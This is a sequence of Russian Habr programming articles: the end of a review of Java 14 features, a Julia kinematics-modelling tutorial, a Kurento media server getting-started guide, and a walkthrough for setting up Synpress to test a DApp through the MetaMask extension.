Неплохо, но совсем позабыли поставить аннотации @Nullable и @Nonnull и проверить наличие адреса в переданных полях. Получили NullPointerException. Что говорит нам исключение?
```
Exception in thread "main" java.lang.NullPointerException
at Program.getStreetFromRequest(Program.java:10)
at Program.main(Program.java:6)
```
Увы, видим только строку, класс и стек. В каком именно месте вернулся null? Может, это request? Может, getAddress() вернул null? А может, и getStreet()? Что ж, цепочки вызовов иногда приносят боль.
Авторы JEP предлагают решение: при формировании исключения предполагается обойти стек, чтобы определить место, где именно вернулся null, а затем вывести название переменных/методов. Попробуем теперь Java 14 с опцией -XX:+ShowCodeDetailsInExceptionMessages. Запускаем и получаем несколько иное:
```
Exception in thread "main" java.lang.NullPointerException: Cannot invoke "String.toUpperCase()" because the return value of "Address.getStreet()" is null
at Program.getStreetFromRequest(Program.java:10)
at Program.main(Program.java:6)
```
Теперь мы знаем, что ночное программирование до добра не доводит (но доводит порой все-таки до выполнения задач в срок), а в нашей программе мы забыли, что адрес не является обязательным полем.
### Records (Preview)
Все еще генерируете getters/setters/equals/hashCode с помощью idea? Тогда этот JEP идёт к вам!
Data-классы занимают в жизни разработчика прикладного программного обеспечения далеко не последнее место. Каждый раз нам приходится или генерировать методы Data-классов с помощью нашей любимой IDE, или использовать различные compile-time плагины для генерации нужных методов, таких как lombok.
В итоге у нас очень много кода, похожего на этот:
```
public class Request {
private Address address;
public Address getAddress() {
return address;
}
public void setAddress(Address address) {
this.address = address;
}
@Override
public boolean equals(Object o) {
if (this == o) return true;
if (o == null || getClass() != o.getClass()) return false;
Request request = (Request) o;
return Objects.equals(address, request.address);
}
@Override
public int hashCode() {
return Objects.hash(address);
}
@Override
public String toString() {
return "Request{" +
"address=" + address +
'}';
}
}
```
Или такого:
```
@Data
@AllArgsConstructor
public class Request {
private Address address;
}
```
В Java 14 участники проекта Amber предлагают новый синтаксис для создания дата-классов. Для этого нужно использовать новое ключевое слово record. Синтаксис для Record немного иной, чем для описания классов или enum, и слегка похож на Kotlin. Код, приведенный выше, можно переписать следующим образом:
```
public record Request(Address address) {
}
```
Все поля записей по умолчанию имеют модификаторы private и final. Сам рекорд является final-классом и не может наследоваться от другого класса, но может реализовывать интерфейсы. В рекорд-классах из коробки мы получаем: getters-методы, публичный конструктор, параметры которого являются все поля record в порядке описания, equals/hashCode и toString. Из неприятного: мы не можем добавить в record поля, кроме тех, которые указаны после названия класса. Например, этот код приведет к ошибке:
```
public record Request(Address address) {
private final String anotherParameter; // compilation error
}
```
### Text Blocks (Second Preview)
Текстовые блоки были выпущены как превью еще в Java 13. Мы, пользователи, покрутили, повертели и дали feedback (я искренне верю, что вы уже используете Java 13 с preview). В результате создатели Java внесли небольшие изменения в textblocks. Во-первых, теперь мы можем явно указывать место окончания строки, поставив escapesequence\s в нашу строку. Вот пример:
```
public static void main(String[] args) {
final var test = """
This is the long text block with escape string \s
that is really well done \s
""";
System.out.println(test);
}
```
Теперь мы явно задали все пробелы до символа \s и все символы пробела будут сохранены до символа \s.
Во-вторых, теперь мы можем переносить длинные строки текстового блока, не получая в итоговую строку \n символов. Для этого мы должны только добавить \ в месте переноса строки. Как это выглядит:
```
public static void main(String[] args) {
final var test = """
This is the long text block with escape string \
that is really well-done functional
""";
System.out.println(test);
```
После выполнения мы получим следующую строку: “This is the long text block with escape string that is really well-done functional”.
Неплохое, как мне кажется, дополнение. Я очень жду перевода этого функционала в standard.
Все функции, которые мы рассмотрели, наверняка будут широко обсуждаться на ближайших конференциях. Некоторые из них уже обсуждались на Joker 2019. Обязательно посмотрите доклад Joker 2019 на эту тему “Feature evolution in Java 13 and beyond” от Cay Horstmann.
### И еще немного интересных вещей
В JEP-списке есть два интересных пункта в инкубаторе. Для начала, у нас появится универсальный инструмент, который будет создавать инсталляторы для разных ОС (ну наконец-то, хочется сказать тем, кто танцевал вокруг установки программ на Windows). Jpacker будет способен создавать инсталляторы msi/exe для Windows, пакеты для macOS и rpm/ deb для Linux. Посмотрим, что из этого выйдет, но в тех редких случаях, когда я делал что-то для desktop, я лично страдал от того, что у меня не было штатного инструмента для сборки инсталлятора.
Еще более перспективным выглядит новый API для доступа к “Foreign-Memory”, т.е. всякого рода нативной или персистентной памяти. В первую очередь этот API пригодится создателям баз данных на Java или создателям фреймворков, таких, как, например, Netty. Именно они, используя Unsafe и ByteBuffer, максимально оптимизируют доступ к памяти с off-heap.
### Следующий релиз. Радость и разочарование
В сентябре нас ждет очередной short-term support release под номером 15. Список JEP, которые войдут в окончательный релиз, еще открыт. Пока можно видеть очень много различных изменений в самом языке, в стандартной библиотеке и виртуальной машине.
Вот список кандидатов (может быстро меняться, актуально смотрим тут: [bugs.openjdk.java.net/secure/Dashboard.jspa?selectPageId=19114](https://bugs.openjdk.java.net/secure/Dashboard.jspa?selectPageId=19114)):
| | |
| --- | --- |
| 111: | Additional Unicode Constructs for Regular Expressions |
| 116: | Extended Validation SSL Certificates |
| 134: | Intuitive Semantics for Nested Reference Objects |
| 152: | Crypto Operations with Network HSMs |
| 198: | Light-Weight JSON API |
| 218: | Generics over Primitive Types |
| 300: | Augment Use-Site Variance with Declaration-Site Defaults |
| 301: | Enhanced Enums |
| 302: | Lambda Leftovers |
| 303: | Intrinsics for the LDC and INVOKEDYNAMIC Instructions |
| 306: | Restore Always-Strict Floating-Point Semantics |
| 338: | Vector API (Incubator) |
| 339: | Compiler Intrinsics for Java SE APIs |
| 348: | Compiler Intrinsics for Java SE APIs |
| 356: | Enhanced Pseudo-Random Number Generators |
| 360: | Sealed Types (Preview) |
| 371: | Hidden Classes |
Как можно видеть, в списке по-прежнему нет сильно ожидаемых вещей. В первую очередь для меня это Project Loom. Идея структурного параллелизма очень популярна в последние годы. Сопрограммы позволяют сильно упростить задачу конкурентных параллельных вычислений и асинхронное исполнение задач. Отличные примеры реализации этой идеи можно увидеть, например, в языках Kotlin (coroutines) и Go (goroutines). В Java также прорабатывают идею структурного параллелизма, и уже есть первые результаты. Пока их можно посмотреть, лишь собрав JDK из репозитория проекта.
Очень перспективный проект Valhalla также пока не порадовал нас каким-либо превью. Интересный доклад по этому проекту был представлен на Joker 2019 (“Нужны ли в Java «инлайн»-типы? Узкий взгляд инженера по производительности на проект Valhalla” от Сергея Куксенко).
Что же представлено в списке?
Первое, что бросается в глаза – это JSON API. Сразу напрашивается вопрос – а зачем? Однозначного ответа явно нет. В JEP-секции о мотивации сказано, что JSON стал чем-то типа стандарта для web-сервисов, и вот оно время, чтобы адаптировать Java SE для взаимодействия с JSON (даже несмотря на то, что сейчас есть тонна библиотек для парсинга JSON). Самое вероятное объяснение – возможность разработчикам ПО использовать небольшой core API, чтобы снизить размер bundle, не затаскивая тяжелый Jackson себе. Иного объяснения я не вижу, поскольку в нем даже не будет databinding.
Также мы видим ряд улучшений, связанных с криптографическим API. Для начала, разработчики JDK хотят внести расширение в процесс валидации SSL-сертификатов, добавив поддержку EVSSL-сертификатов. С помощью этого API в Java можно будет определить, является ли SSL-соединение доверенным по сертификату EV (Extended Validation). Будет полностью поддержан EVSSL-сертификат в соответствии с guideline. Также будет добавлен новый криптографический алгоритм EdDSA и будет улучшена проверка HSM-криптографии.
Из языковых вещей я бы выделил реализацию Generics над примитивами. Все, кто когда-либо программировал на C# и перешел на Java, наверняка могли задать вопрос, почему же нельзя делать Generic-типы на примитивах. Ответ прост – Generics работают только с объектами, а примитивы не являются объектами и, в частности, не наследуют Object-класс. Уже не первый год идет война по этому вопросу, и Brian Goetz снова возвращается к нему. Описывать особо пока нечего. Задача понятна – поддержать такие конструкции, как List. Но даже на текущий момент есть 13 открытых вопросов, которые надо решить перед внедрением этого функционала. Честно говоря, мне интересно, чем закончится этот сериал.
И последнее, что хочется затронуть, – это sealed types. Это очередной шаг к pattern matching. Sealed Types – это расширение языка, которое внедряет ключевые слова sealed (модификатор) и permits для класса или интерфейса.
С помощью sealed-класса мы ограничиваем число наследников только теми классами, которые указаны в permits (явное ограничение) или в той же единице компиляции (файле). Пример описания sealed class:
```
// неявно
public abstract sealed class Base {
public static class ChildA extends Base{}
public static class ChildB extends Base{}
}
// явно
public sealed interface BaseInterface permits ChildC, ChildD{
}
//в другом файле
public class ChildC implements BaseInterface {
}
//в другом файле
public class ChildD implements BaseInterface {
}
```
Sealed-модификатор гарантирует, что только ограниченный конечный набор наследников может расширять базовый класс или реализовывать интерфейс. Это свойство можно использовать при обработки объектов данных классов. И, конечно же, это отличный кандидат на использование в switch-операторе с pattern matching.
### Заключение
Мы посмотрели на разные нововведения JDK этого года. Какие-то из них выстрелят, какие-то нет. Но больше всего в новых JDK я жду новые маленькие (или не очень) оптимизации, которые бесплатно делают наши программы быстрее с каждым релизом. И если вы были на последнем Joker 2019 и посетили доклад Тагира Валеева Java 9-14: Маленькие оптимизации, то, скорее всего, также как и я, были впечатлены той работой, которую проделывают контрибьюторы для оптимизации JDK. Ее результаты не видны с первого взгляда и не отражены не в одном JEP, но мы используем их каждый день.
Хороших выпусков Java нам всем. Изучайте новые возможности платформы, ходите на конференции и следите за трендами. | https://habr.com/ru/post/488302/ | null | ru | null |
# Моделирование кинематики — это не сложно
Мне давно хочется заняться созданием роботов, но всегда не хватает свободных денег, времени или места. По этому я собрался писать их виртуальные модели!
Мощные инструменты, позволяющие это делать, либо сложно стыкуются со сторонними программами ([Modelica](https://habrahabr.ru/search/?q=%5BModelica%5D)), либо проприетарны (Wolfram Mathematica, различные САПР), и я решил делать велосипед на [Julia](http://julialang.org/). Потом все наработки можно будет состыковать с сервисами [ROS](https://github.com/jdlangs/RobotOS.jl).
Будем считать, что наши роботы двигаются достаточно медленно и их механика находится в состоянии с наименьшей энергией, при ограничениях, заданных конструкцией и сервоприводами. Таким образом нам достаточно решить задачу оптимизации в ограничениях, для чего понадобятся пакеты "[JuMP](https://github.com/JuliaOpt/JuMP.jl)" (для нелинейной оптимизации ему понадобится пакет "[Ipopt](https://github.com/JuliaOpt/Ipopt.jl)", который не указан в зависимостях (вместо него можно использовать проприетарные библиотеки, но я хочу ограничится свободными) и должен быть установлен отдельно). Решать дифференциальные уравнения, как в Modelica, мы не будем, хотя для этого есть достаточно развитые пакеты, например "[DASSL](https://github.com/pwl/DASSL.jl)".
Управлять системой мы будем используя реактивное программирование (библиотеку "[Reactive](https://github.com/JuliaLang/Reactive.jl)"). Рисовать в «блокноте» (Jupyter), для чего потребуются "[IJulia](https://github.com/JuliaLang/IJulia.jl)", "[Interact](https://github.com/JuliaLang/Interact.jl)" и "[Compose](https://github.com/GiovineItalia/Compose.jl)". Для удобства еще понадобится "[MacroTools](http://github.com/MikeInnes/MacroTools.jl)".
Для инсталляции пакетов надо выполнить в Julia REPL команду
```
foreach(Pkg.add, ["IJulia", "Ipopt", "Interact", "Reactive", "JuMP", "Compose", "MacroTools"])
```
Рассмотрим простую двумерную систему, схематически изображенную на рисунке.
Красными линиями там обозначены пружины, черными — нерастяжимые веревки, маленький кружечек — невесомый блок, большой — груз. У веревок есть длина, у пружины — длина и жесткость. Переменные координаты назовем:
> (x,y) — координаты груза (большого круга)
>
> (xctl, yctl) — координаты «управляющего конца» веревки, длиной 1.7 привязанной к грузу.
>
> (xp, yp) — координаты невесомого точечного блока, способного скользить по веревке.
Одна пружина длины 0.1 и жесткости 1 закреплена в точке (0,3) и прицеплена к грузу. Вторая пружина длиной 0.15 и жесткостью 5 соединяет груз и блок, который скользит по веревке длиной 6 закрепленной в точках (5,1) и (4.5,5).
(параметры подбирались эволюционно, что бы мне было наглядно и понятно как она себя ведет при добавлении новых фич)
```
@wire(x,y, xctl,yctl, 1.7)
@wire(xp, yp, 5.0,1.0, 4.5,5.0, 6.0)
@energy([w(x,y, 0,3, 1, 0.1), w(x,y, xp,yp, 5, 0.15), 0.4*y])
```
**полный код функции, решающей уравнение**
```
function myModel(xctl, yctl)
m = Model()
@variable(m, y >= 0)
@variable(m, x)
@variable(m, yp)
@variable(m, xp)
@wire(x,y, xctl,yctl, 1.7)
@wire(xp, yp, 5.0,1.0, 4.5,5.0, 6.0)
@energy([w(x,y, 0,3, 1, 0.1), w(x,y, xp,yp, 5, 0.15), 0.4*y])
status = solve(m)
xval = getvalue(x)
yval = getvalue(y)
xpval = getvalue(xp)
ypval = getvalue(yp)
# print("calculate $status $xval $yval for $xctl, $yctl\n")
(status, xval, yval, xpval, ypval)
end
```
Макрос wire задает ограничение «связывание нерастяжимой веревкой» заданной длины два объекта или два объекта и блок.
Макрос energy описывает минимизируемую функцию энергии — специальный терм w описывает пружину (с заданной жесткостью и длиной), а 0.4\*y — энергия груза в гравитационном поле, слишком простая, что бы для ее придумывать специальный синтаксис.
Эти макросы выражаются через библиотечными NLconstraint и NLobjective (линейные constraint и objective эффективнее, но с нашими функциями не справляются):
```
@NLconstraint(m, (x-xctl)^2+(y-yctl)^2 <= 1.7)
@NLconstraint(m, sqrt((5.0-xp)^2+(1.0-yp)^2) + sqrt((4.5-xp)^2+(5.0-yp)^2) <= 6.0)
@NLobjective(m, Min, 1*(sqrt(((x-0)^2 + (y - 3)^2)) - 0.1)^2
+ 5*(sqrt((x - xp)^2 + (y - yp)^2) - 0.15)^2
+ 0.4*y)
```
Использование в ограничениях «меньше или равно» вместо «равно» означает что веревка может провисать, но не растягиваться. Для двух точек можно использовать строгое равенство, если надо соединить их «жестким стержнем», заменив соответствующий макрос.
**код макросов**
```
macro wire(x,y,x0,y0, l)
v = l^2
:(@NLconstraint(m, ($x0-$x)^2+($y0-$y)^2 <= $v))
end
macro wire(x,y, x0,y0, x1,y1, l)
:(@NLconstraint(m, sqrt(($x0-$x)^2+($y0-$y)^2) + sqrt(($x1-$x)^2+($y1-$y)^2) <= $l))
end
calcenergy(d) = MacroTools.@match d begin
[t__] => :(+$(map(energy1,t)...))
v_ => energy1(v)
end
energy1(v) = MacroTools.@match v begin
w(x1_,y1_, x2_,y2_, k_, l_) => :($k*(sqrt(($x1 - $x2)^2 + ($y1 - $y2)^2) - $l)^2)
x_ => x
end
macro energy(v)
e = calcenergy(v)
:(@NLobjective(m, Min, $e))
end
```
Теперь опишем элементы управления:
```
xctl = slider(-2:0.01:5, label="X Control")
xctlsig = signal(xctl)
yctl = slider(-1:0.01:0.5, label="Y Control")
yctlsig = signal(yctl)
```
присоединим их к нашей системе:
```
ops = map(myModel, xctlsig, yctlsig)
```
И отобразим это в notebook:
**пара вспомогательных функций**
```
xscale = 3
yscale = 3
shift = 1.5
pscale(x,y) = ((x*xscale+shift)cm, (y*yscale)cm)
function l(x1,y1, x2,y2; w=0.3mm, color="black")
compose(context(),
linewidth(w), stroke(color),
line([pscale(x1, y1), pscale(x2, y2)]))
end
```
```
@manipulate for xc in xctl, yc in yctl, op in ops
compose(context(),
# text(150px, 220px, "m = $(op[2]) $(op[3])"),
# text(150px, 200px, "p = $(op[4]) $(op[5])"),
circle(pscale(op[2], op[3])..., 0.03),
circle(pscale(op[4], op[5])..., 0.01),
l(op[2], op[3], op[4], op[5], color="red"),
l(op[2], op[3], 0, 3, color="red"),
l(op[2], op[3], xc, yc),
l(op[4], op[5], 5, 1),
l(op[4], op[5], 4.5,5)
)
end
```
**полный вариант кода**
```
using Interact, Reactive, JuMP, Compose, MacroTools
macro wire(x,y,x0,y0, l)
v = l^2
:(@NLconstraint(m, ($x0-$x)^2+($y0-$y)^2 <= $v))
end
macro wire(x,y, x0,y0, x1,y1, l)
:(@NLconstraint(m, sqrt(($x0-$x)^2+($y0-$y)^2) + sqrt(($x1-$x)^2+($y1-$y)^2) <= $l))
end
calcenergy(d) = MacroTools.@match d begin
[t__] => :(+$(map(energy1,t)...))
v_ => energy1(v)
end
energy1(v) = MacroTools.@match v begin
w(x1_,y1_, x2_,y2_, k_, l_) => :($k*(sqrt(($x1 - $x2)^2 + ($y1 - $y2)^2) - $l)^2)
x_ => x
end
macro energy(v)
e = calcenergy(v)
:(@NLobjective(m, Min, $e))
end
function myModel(xctl, yctl)
m = Model()
@variable(m, y >= 0)
@variable(m, x)
@variable(m, yp)
@variable(m, xp)
@wire(x,y, xctl,yctl, 1.7)
@wire(xp, yp, 5.0,1.0, 4.5,5.0, 6.0)
@energy([w(x,y, 0,3, 1, 0.1), w(x,y, xp,yp, 5, 0.15), 0.4*y])
status = solve(m)
xval = getvalue(x)
yval = getvalue(y)
xpval = getvalue(xp)
ypval = getvalue(yp)
# print("calculate $status $xval $yval for $xctl, $yctl\n")
(status, xval, yval, xpval, ypval)
end
xctl = slider(-2:0.01:5, label="X Control")
xctlsig = signal(xctl)
yctl = slider(-1:0.01:0.5, label="Y Control")
yctlsig = signal(yctl)
ops = map(myModel, xctlsig, yctlsig)
xscale = 3
yscale = 3
shift = 1.5
pscale(x,y) = ((x*xscale+shift)cm, (y*yscale)cm)
function l(x1,y1, x2,y2; w=0.3mm, color="black")
compose(context(),
linewidth(w), stroke(color),
line([pscale(x1, y1), pscale(x2, y2)]))
end
@manipulate for xc in xctl, yc in yctl, op in ops
compose(context(),
# text(150px, 220px, "m = $(op[2]) $(op[3])"),
# text(150px, 200px, "p = $(op[4]) $(op[5])"),
circle(pscale(op[2], op[3])..., 0.03),
circle(pscale(op[4], op[5])..., 0.01),
l(op[2], op[3], op[4], op[5], color="red"),
l(op[2], op[3], 0, 3, color="red"),
l(op[2], op[3], xc, yc),
l(op[4], op[5], 5, 1),
l(op[4], op[5], 4.5,5)
)
end
```
Простой способ запустить notebook: в Julia REPL набрать `using IJulia notebook()`. Это должно открыть в браузере "<http://localhost:8888/tree>". Там надо выбрать «new»/«Julia», там в поле ввода скопировать код и нажать Shift-Enter. | https://habr.com/ru/post/313138/ | null | ru | null |
# Java, Spring, Kurento и медиасервисы

Существует уже немало медиа сервисов, но люди продолжают их создавать. Решил и я заняться изобретением своего велосипеда.
Натолкнувшись на проект [Kurento](http://www.kurento.org/), понял что это то, что мне надо. Данная статья является частично переводом [Kurento Documentatin](https://media.readthedocs.org/pdf/doc-kurento/stable/doc-kurento.pdf), частично это заметки о моих экспериментах с KurentoTutorial. Надеюсь что разработчикам, приступающим к изучению данного вопроса, этот материал поможет быстрее освоить тему создания медиа сервисов.
Kurento c Esperanto переводится «поток». Разработан он в испанском университете [Rey
Juan Carlos Universidad](https://www.urjc.es/). Kurento — это WebRTC Media Server и набор клиентского API, который упрощает создание приложений для Web и смартфонов. Это могут быть сервисы видеотелефонии, видеоконференцсвязи, мониторинг картинок от видеокамер с распознаванием движения, может проигрывать аудио-видео контент из файла или из сети, распознавать лицо или автомобильные номера, и много чего еще. Код Kurento является опенсорсным, распространяется на условиях лицензии [Apache License Version 2.0](http://www.apache.org/licenses/LICENSE-2.0) и доступен на [Гитхабе](https://github.com/Kurento). Как утверждают создатели Kurento, он похож на Lego, из его программных блоков можно сделать много полезных приложений. Могут применяться блоки прямо «из коробки», но можно разрабатывать так же свои плагины при желании.
Примеры Web приложений приведены на Java, Node.js, JavaScript, хотя можно разрабатывать на любом языке, главное что бы обмен с Kurento Media Server-ом происходил на понятном ему Kurento-протоколе. Правда, для вышеупомянутых языков уже изобретены библиотеки, так что мороки будет меньше. А поскольку я изучаю Java и Spring, мои комментарии будут для этих примеров.
Всякий уважающий себя туториал начинается с приложения HelloWorld. Не стал исключением и данный. Но прежде чем написать первое приложение, нужно установить KMS — Kurento Media Server, который написан на C++ и устанавливается только на Ubuntu или Linux Mint, причем версия (на момент написания статьи) должна быть между 14 и 18. Я сразу установил Linux Mint 19 версию и KMS не установился, пришлось откатывать на 18-ю.
Ну вот установили систему, Intellij Idea, добавляем Kurento репозиторий и устанавливаем KMS:
```
sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys 5AFA7A83
```
```
sudo tee "/etc/apt/sources.list.d/kurento.list" >/dev/null <
```
```
sudo apt-get update
```
```
sudo apt-get install kurento-media-server
```
Стартуем KMS командой:
```
sudo service kurento-media-server start
```
Клонируем весь туториал для Java:
```
git clone https://github.com/Kurento/kurento-tutorial-java.git
```
Переходим в нужную директорию
```
cd kurento-tutorial-java/kurento-hello-world
```
Запускаем приложение под Maven или, как в моем случае, через Идею. После запуска Web приложения заходим через браузер Firefox по адресу [localhost](https://localhost):8443/ видим страничку, где после нажатия на кнопку «Start» получаем что-нибудь похожее на это

В левом видео-элементе отображается картинка от Web камеры, а в правом та же картинка, но изображение пропущено через KMS петлей (loop-back).
На основании данного опыта делаем вывод: HelloWorld получается запустить почти всегда.
Теперь разберемся как это работает. На данном рисунке показана схема подключения частей нашего опыта.

Схематически выглядит так, как я описал. Логически наш опыт состоит из трех главных частей: размещенный в браузере JavaScript Client, только что скомпилированный Application Server и установленный в самом начале Kurento Media Server. Взаимодействие этих частей показано на рисунке ниже.


JavaScript Client отправляет Application Server — у текстовое сообщение «Start». Application Server выполняет три основные действия в этом приложении:
```
final MediaPipeline pipeline = kurento.createMediaPipeline();
user.setMediaPipeline(pipeline);
final WebRtcEndpoint webRtcEp =
new WebRtcEndpoint.Builder(pipeline).build();
user.setWebRtcEndpoint(webRtcEp);
webRtcEp.connect(webRtcEp);
```
Создает MediaPipeline, по которой будет передаваться медиа-трафик, создает WebRtcEndpoint-объект, обрабатывающий медиа-трафик и заворачивает передачу этого блока себе на прием.
На этом краткое ознакомление с приложением HelloWorld, использующим Kurento, завершаю. Желаю успешного создания медиа-сервисов.
[Следующая статья](https://habr.com/post/435922/) | https://habr.com/ru/post/435580/ | null | ru | null |
# Сквозное тестирование DApp в связке с расширением Metamask
Всем привет! На связи снова QA Engineer Илья из компании Tourmaline Core и это вторая часть статьи про тестирование DApp.
В прошлый раз я рассказывал о том, как [можно тестировать](https://habr.com/ru/post/693566/) подключение и работоспособность блокчейн-приложения через WalletConnect с использованием мобильного эмулятора и библиотеки Detox. На этот раз я хочу рассмотреть процесс тестирования с другой стороны, а именно через расширение браузера при помощи инструмента Synpress. Я расскажу, как работает этот инструмент, как его настроить и запускать тесты.
### Предисловие
Сейчас децентрализованные приложения (DApp’s) активно развиваются, конкуренция растет и поэтому разработчики всё больше концентрируются на качестве выпускаемого продукта. С недавнего времени начали появляться различные инструменты для тестирования таких приложений, в частности для E2E тестов, которые, согласно пирамиде тестирования, являются максимально ценными для бизнеса. На данный момент выбор инструментов для комфортного написания работающих тестов не большой, но всё же понемногу расширяется. Далее я расскажу об одном из таких инструментов.
### Немного контекста
На нашем проекте есть длинный пользовательский флоу, который не покрыт тестами. На ручное тестирование уходило много времени и в связи с этим появилась задача это дело упростить.
Кратко расскажу о составных нашего тестируемого субъекта. Первое — это популярный кошелек для хранения криптовалюты MetaMask. Работать с ним можно через мобильное приложение или через браузерное расширение (работает со всеми популярными браузерами). Второе — наше web-приложение (оно же далее — DApp). Чтобы получить доступ к действиям в приложении, нужно авторизоваться в MetaMask с помощью одного из двух представленных методов. После подтверждения своей принадлежности к аккаунту кошелька, вы можете работать с сервисом. Каждый шаг в DApp, тем или иным образом завязан с вашим кошельком. Например, создание транзакции, будет сопровождаться всплывающим уведомлением, которое необходимо подписать/подтвердить.
Теперь, когда понятно взаимодействие, углубимся в детали и разработаем план тестирования.
#### MetaMask
Хоть и MetaMask просто кошелек с криптоактивами, он разработан как инструмент, позволяющий всем разработчикам легко интегрировать его в свои приложения. Это дает возможность пользователю работать со своими активами через различные сторонние сервисы. Для блокчейна такое развитие DeFi (децентрализованные финансовые сервисы) по сути альтернатива банковскому сектору. Когда вы делаете покупку в обычном интернет-магазине, вас линкует к окну оплаты именно вашего банка. Таким же образом взаимодействуют блокчейн-сервисы с MetaMask.
Для начала тестирования нужно выяснить шаги авторизации в браузерном расширении MetaMask, чтобы повторить это в автотестах. После установки расширения из [chrome web store](https://chrome.google.com/webstore/detail/metamask/nkbihfbeogaeaoehlefnkodbefgpgknn), в браузере открывается отдельная вкладка с регистрацией/авторизацией. Авторизация нестандартна — нужен ввод 12 специальных секретных слов, которые вы получили при регистрации. Также необходимо придумать и написать новый пароль. Когда мы авторизовались, нужно выбрать тестовую сеть goerli, не забыв перед этим включить отображение тестовых сетей в настройках своего профиля. Тестовые сети используются для отладки и дебага ваших DApp, имитируя основную сеть (mainnet) и позволяя использовать ненастоящие эфиры. Все это мы сделали потому что наш dev работает на этой тестовой сети.
Теперь представим ситуацию, что есть кнопка, нажатием на которую мы можем связать между собой учетную запись в MetaMask и DApp. При этом, при нажатии на нее должна будет вызываться нотификация от MetaMask, которую нужно одобрить для подключения к приложению. Но как решить такую нетривиальную для тестирования задачу?
Подключение к DApp через расширение MetaMask для браузераМоей целью было найти инструмент, позволяющий работать с браузерным расширением и несколькими вкладками. На первый взгляд, идеальным вариантом была библиотека Playwright. Она позволяет делать и [то](https://playwright.dev/docs/chrome-extensions), и [другое](https://playwright.dev/docs/pages#multiple-pages), а значит вариант подходящий. Но такое решение потребовало бы много времени, поэтому я стал искать дальше, и нашел уже готовые решения, использующие Playwright как основу для работы с Metamask — [Dappeteer](https://github.com/decentraland/dappeteer) и [Synpress](https://github.com/Synthetixio/synpress). Я попробовал оба варианта и хочу кратко выделить минусы и плюсы каждого.
#### Dappeteer
Является надстройкой над Puppeteer.
Минусы:
1. Много настраивать, чтобы тесты не выглядели как каша
2. Самостоятельный менеджмент асинхронности в тестах, что всегда приводило к неработающим тестам.
Плюсы:
1. Быстрый запуск и выполнение тестов
2. Небольшой вес пакета
3. Можно писать тесты на Puppeteer или Playwright
#### Synpress
Является надстройкой над Cypress. Cypress контролирует интеракции с DApp, а Playwright — интеракции с MetaMask и работу с несколькими вкладками. Так и получился Synpress.
Минусы:
1. Вес всех зависимостей, с которыми устанавливается Synpress ≈ 500мб
2. Долгий запуск
Плюсы:
1. Удобно конфигурировать
2. Понятная документация с примерами и статьями по ней
3. Понятные тесты
По итогу, более близким мне оказался Synpress, так как ранее имелся опыт с Cypress, поэтому я выбрал его.
### Настраиваем Synpress
Далее опишу необходимые шаги для запуска первого теста
> Так как Synpress это обертка под Cypress, то вся конфигурация и структура построения будет очень похожа на него
>
>
**Шаг 1**: Инициализация проекта и добавление зависимостей
Инициализируем проект `yarn init` и добавляем в зависимости Cypress и Synpress:
`yarn add —D cypress @synthetixio/synpress`
**Шаг 2**: Создание папок и файлов
Делаем базовый сетап также как под Cypress:
Создаем папку *tests* в корне, а в ней еще две — *support* и *e2e*.
В папке support создаем 2 файла — *index.js* и *commands.js*. В *index.js* нужно импортировать команды Synpress:
```
import '@synthetixio/synpress/support/index';
```
Если этого не сделать, то они не будут работать в тестах и появится ошибка, что такой функции не найдено. Именно этот файл позволяет Cypress использовать функции имплементированные в Synpress.
Файл *commands.js* нужен для [кастомных команд](https://docs.cypress.io/api/cypress-api/custom-commands), поэтому необязателен. Но если вы будете его использовать, то в *index.js* также нужно импортировать вот этот файл:
```
import './commands';
```
Теперь добавляем папку *specs* в папку *e2e*. В ней будем создавать и писать тесты.
**Шаг 3**: Создание конфигурации Synpress
В корневой папке создаем файл конфигурации synpress.config.js. Вид внутренностей зависит от версии Cypress, так что далее все примеры будут на версии выше 10.0. Данный файл должен содержать настройки для Cypress. Так выглядит стандартный бойлерплейт с добавленными туда параметрами:
```
const { defineConfig } = require('cypress');
const synpressPlugins = require('@synthetixio/synpress/plugins');
module.exports = defineConfig({
e2e: {
specPattern: 'tests/e2e/specs',
supportFile: 'tests/support/index.js',
setupNodeEvents(on, config) {
synpressPlugins(on, config);
return config
},
},
});
```
Важно заполнить следующие параметры:
*specPattern* *—* Путь до папки с тестами
*supportFile* *—* Путь до файла с плагинами
Также необходимо добавить плагин *synpressPlugins(on, config)* через функцию *setupNodeEvents(on, config).*
**Шаг 4**: Добавление .env файла
Для правильной работы Synpress, требуется создать файл конфигурации переменных окружения .env с необходимыми переменными, а именно *NETWORK\_NAME* и *PRIVATE\_KEY* или *SECRET\_WORDS.* Их также можно задать явно в специальном методе, но это лишний код. Пример .env файла:
```
NETWORK_NAME=goerli
PRIVATE_KEY=04e3efb6e8c6b**********443df6c40803224b96e829f01df05985806f42
SECRET_WORDS='test test test test test test test test test test test test'
```
В *NETWORK\_NAME* указываем название тестовой сети, которую будем использовать. Для авторизации нужно указать приватный ключ аккаунта MetaMask (*PRIVATE\_KEY*), или 12 слов, которые сохранили после регистрации (*SECRET\_WORDS*). Они нужны, чтобы Synpress мог авторизоваться под вашим аккаунтом и совершать работу через него.
Наш минимальный джентльменский набор готов, а значит можно приступать к написанию первого теста.
**Шаг 5**: Написание теста
Создаем новый файл в папке *tests/e2e/specs*. В файле будет лежать сам тест, который мы назовем *loginToMetamask.js*. В нем напишем тест на вход в DApp через MetaMask.
В примере будем пользоваться тестовым DApp’ом, который задеплоен на [гитхабе](https://metamask.github.io/test-dapp/).
Чтобы связать свой аккаунт кошелька с DApp, нужно выполнить следующую последовательность действий:
1. зайти на сайт
2. нажать на кнопку "Connect"
3. подтвердить коннект в появившейся нотификации от браузерного расширения MetaMask.
Теперь повторяем эти действия, но в тестах. Код теста будет таким:
```
it('connect to DApp with Metamask extension', () => {
// посещаем сайт
cy.visit('https://metamask.github.io/test-dapp/');
// кликаем на кнопку Connect
cy.get('#connectButton').click();
// после клика должна появиться нотификация
cy.acceptMetamaskAccess().should('be.true');
// подключаемся к DApp
cy.get('#connectButton').should('have.text', 'Connected');
// убеждаемся, что UI изменился
});
```
Проверим, как работает тест. Переходим в package.json и добавляем следующий скрипт для запуска тестов Synpress:
```
"test": "synpress run —-configFile synpress.config.js"
```
Обязательно указываем в скрипте путь к конфиг файлу --*configFile synpress.config.js*
Запускаем скрипт через `yarn test`. Тест успешно выполнился, но как это выглядит под капотом?
